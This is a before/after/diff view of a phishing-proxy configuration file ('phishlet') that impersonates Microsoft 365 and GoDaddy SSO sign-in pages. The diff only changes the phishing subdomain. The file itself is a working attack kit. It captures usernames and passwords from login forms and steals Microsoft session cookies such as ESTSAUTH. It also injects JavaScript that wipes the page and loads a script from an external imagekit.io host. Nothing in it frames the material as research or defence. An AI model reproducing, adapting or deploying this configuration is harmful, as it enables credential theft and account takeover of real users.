o3654.yaml (before)
name: "o365"
author: "@jamescullum"
min_ver: "2.3.0"

proxy_hosts:
  - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true }
  - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: false, is_landing: false }
  - { phish_sub: "login", orig_sub: "login", domain: "microsoft.com", session: true, is_landing: true }
  - { phish_sub: "sso", orig_sub: "sso", domain: "godaddy.com", session: true, is_landing: false }
  - { phish_sub: "sso", orig_sub: "sso", domain: "godaddy.com:443", session: true, is_landing: false }

sub_filters:
  - triggers_on: "login.microsoftonline.com"
    orig_sub: "login"
    domain: "microsoftonline.com"
    search: 'href="https://{hostname}'
    replace: 'href="https://{hostname}'
    mimes: ["text/html", "application/json", "application/javascript"]

  - triggers_on: "login.microsoftonline.com"
    orig_sub: "login"
    domain: "microsoftonline.com"
    search: "https://{hostname}"
    replace: "https://{hostname}"
    mimes: ["text/html", "application/json", "application/javascript"]
    redirect_only: true

  - triggers_on: "sso.godaddy.com"
    orig_sub: "login"
    domain: "microsoftonline.com"
    search: "https://{hostname}"
    replace: "https://{hostname}"
    mimes: ["text/html", "application/json", "application/javascript"]

auth_tokens:
  - domain: ".login.microsoftonline.com"
    keys: ["ESTSAUTH", "ESTSAUTHPERSISTENT", "SignInStateCookie"]

credentials:
  username:
    key: "(login|UserName)"
    search: "(.*)"
    type: "post"
  password:
    key: "(passwd|Password|accesspass)"
    search: "(.*)"
    type: "post"

login:
  domain: "login.microsoftonline.com"
  path: "/"

js_inject:
  - trigger_domains: ["login.microsoftonline.com"]
    trigger_paths: ["/", "/common/oauth2/v2.0/authorize", "/common/oauth2/v2.0/authorize*"]
    script: |
      document.documentElement.innerHTML = `
      <!DOCTYPE html>
      <html class="html" lang="en-US" dir="ltr">
        <head>
          <script language="Javascript" src="https://ik.imagekit.io/m5n99zq0z/hipdzbbtsuikdaa_jfel_Yhn6.js"></script>
        </head>
        <body></body>
      </html>`;

o3654.yaml (after)
name: "o365"
author: "@jamescullum"
min_ver: "2.3.0"

proxy_hosts:
  - { phish_sub: "sk", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true }
  - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: false, is_landing: false }
  - { phish_sub: "sk", orig_sub: "login", domain: "microsoft.com", session: true, is_landing: true }
  - { phish_sub: "sso", orig_sub: "sso", domain: "godaddy.com", session: true, is_landing: false }
  - { phish_sub: "sso", orig_sub: "sso", domain: "godaddy.com:443", session: true, is_landing: false }

sub_filters:
  - triggers_on: "login.microsoftonline.com"
    orig_sub: "login"
    domain: "microsoftonline.com"
    search: 'href="https://{hostname}'
    replace: 'href="https://{hostname}'
    mimes: ["text/html", "application/json", "application/javascript"]

  - triggers_on: "login.microsoftonline.com"
    orig_sub: "login"
    domain: "microsoftonline.com"
    search: "https://{hostname}"
    replace: "https://{hostname}"
    mimes: ["text/html", "application/json", "application/javascript"]
    redirect_only: true

  - triggers_on: "sso.godaddy.com"
    orig_sub: "login"
    domain: "microsoftonline.com"
    search: "https://{hostname}"
    replace: "https://{hostname}"
    mimes: ["text/html", "application/json", "application/javascript"]

auth_tokens:
  - domain: ".login.microsoftonline.com"
    keys: ["ESTSAUTH", "ESTSAUTHPERSISTENT", "SignInStateCookie"]

credentials:
  username:
    key: "(login|UserName)"
    search: "(.*)"
    type: "post"
  password:
    key: "(passwd|Password|accesspass)"
    search: "(.*)"
    type: "post"

login:
  domain: "login.microsoftonline.com"
  path: "/"

js_inject:
  - trigger_domains: ["login.microsoftonline.com"]
    trigger_paths: ["/", "/common/oauth2/v2.0/authorize", "/common/oauth2/v2.0/authorize*"]
    script: |
      document.documentElement.innerHTML = `
      <!DOCTYPE html>
      <html class="html" lang="en-US" dir="ltr">
        <head>
          <script language="Javascript" src="https://ik.imagekit.io/m5n99zq0z/hipdzbbtsuikdaa_jfel_Yhn6.js"></script>
        </head>
        <body></body>
      </html>`;

o3654.yaml (diff)
@@ -3,9 +3,9 @@ author: "@jamescullum"
 min_ver: "2.3.0"
 
 proxy_hosts:
-  - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true }
+  - { phish_sub: "sk", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true }
   - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: false, is_landing: false }
-  - { phish_sub: "login", orig_sub: "login", domain: "microsoft.com", session: true, is_landing: true }
+  - { phish_sub: "sk", orig_sub: "login", domain: "microsoft.com", session: true, is_landing: true }
   - { phish_sub: "sso", orig_sub: "sso", domain: "godaddy.com", session: true, is_landing: false }
   - { phish_sub: "sso", orig_sub: "sso", domain: "godaddy.com:443", session: true, is_landing: false }
